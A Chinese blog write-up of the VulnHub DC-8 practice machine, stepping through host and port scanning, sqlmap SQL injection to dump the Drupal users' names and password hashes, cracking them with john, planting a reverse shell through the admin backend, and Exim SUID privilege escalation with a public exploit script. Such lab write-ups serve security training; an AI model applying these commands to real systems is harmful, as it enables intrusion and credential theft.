vulnhub靶机渗透DC-8

最新推荐文章于 2024-05-17 17:21:49 发布
最新推荐文章于 2024-05-17 17:21:49 发布
阅读量95 收藏
点赞数
分类专栏: 靶机笔记 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129617296
版权

靶机入侵——DC8

1、环境搭建

下载地址:http://www.vulnhub.com/entry/dc-8,367/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24

    ​ 192.168.80.137 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.137
    在这里插入图片描述
    ​ 发现开放了80、22端口

  • web端进一步信息收集

    通过wappalyzer 插件我们收集到站点的cms、中间件、语言等信息
    在这里插入图片描述

3、漏洞挖掘与利用

  • 在翻看网站页时,发现可能存在SQL注入漏洞,经过单引号测试,发现确实存在。
    在这里插入图片描述

  • 使用sqlmap工具进行SQL注入攻击:

    获得库名:

    sqlmap -u http://192.168.80.137/?nid=2* --dbs --tamper=space2comment --leve 3
    在这里插入图片描述

    获得表名:猜测网站用户数据在d7db数据库中

    sqlmap -u http://192.168.80.137/?nid=2* -D d7db --tables
    在这里插入图片描述
    发现用户表:user,查看其字段

sqlmap -u http://192.168.80.137/?nid=2* -D d7db -T users --columns
在这里插入图片描述

发现用户及密码字段,查看字段。获得账户及密码密文

sqlmap -u http://192.168.80.137/?nid=2* -D d7db -T users -C name,pass --dump
在这里插入图片描述

  • 可以尝试使用john暴力破解密文,将密文保存到pass.txt

    john --wordlist=/usr/share/john/password.lst --rules pass.txt

    先破解john用户的密码,因为一般情况非管理员的密文爆破有更大概率

    得到结果为 turtle

  • 先尝试使用john用户登录后台寻找突破口,若不能成功,则继续爆破admin用户

  • 尝试ssh登录时,发现需要秘钥。

  • 扫描网站目录,发现登录界面:dirsearch -u http://192.168.80.137/ -e* -i 200
    在这里插入图片描述

  • 使用john登录
    在这里插入图片描述

  • 后台寻找利用点 ,写入反弹命令。
    在这里插入图片描述

    写入命令
    在这里插入图片描述

    提交表单,加载含反弹命令的页面。
    在这里插入图片描述

  • 提交成功,触发反弹
    在这里插入图片描述
    在这里插入图片描述

  • 使用python获得交互式shell

    python -c ‘import pty; pty.spawn(“/bin/bash”)’

4、提权

  • 尝试免密使用的root级别命令进行提权:sudo -l 。但是执行命令需要当前用户密码。

  • 尝试SUID提权:find / -perm -4000 -print 2>/dev/null

    或者:find / -perm -u=s -type f 2>/dev/null
    在这里插入图片描述

  • 发现exim4具有suid,查看版本号,再收集对应的提权模块
    在这里插入图片描述

  • 搜索利用模块, searchsploit exim 4
    在这里插入图片描述

  • 将脚本下载到靶机,当其他目录没有写权限时,记得进入/tmp目录下载

    查看使用方法
    在这里插入图片描述
    在这里插入图片描述

    下载,添加权限,执行
    在这里插入图片描述
    利用使用说明执行命令提权,发现./46996.sh -m setuid不行,./46996.sh -m netcat可以

  • 成功提权,获得flag
    在这里插入图片描述
    在这里插入图片描述

不要温顺地走进那个良夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3485
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2364
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 1888
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2838
Vulnhub靶机渗透学习——DC-9
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 243
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vulnhub靶机渗透测试DC-2靶机渗透
m0_62008601的博客
04-29 1365
攻击机-kali-IP:192.168.56.102 靶机-dc2-ip:192.168.103 关于我的这两台机子的网络设置在上一篇文章中已经提到,这里就不再叙述。 查找dc-2 的IP arp-scan-l 得到ip为192.168.56.103 扫描开启的端口 nmap -sV -p- 192.168.56.103 此时发现开启了80端口和ssh服务且将ssh服务的端口改成了7744端口(ssh默认端口是:22) 因为开启了80端口,此时我们可以去访问它的web服务 此
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2957
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2452
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1824
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 652
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 972
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 727
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
【linux系统学习教程 Day03】网络安全之Linux系统学习教程,用户和用户组管理,创建用户,删除用户,创建组,删除组....
最新发布
m0_67844671的博客
05-17 706
【linux系统学习教程 Day03】网络安全之Linux系统学习教程,用户和用户组管理,创建用户,删除用户,创建组,删除组....
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值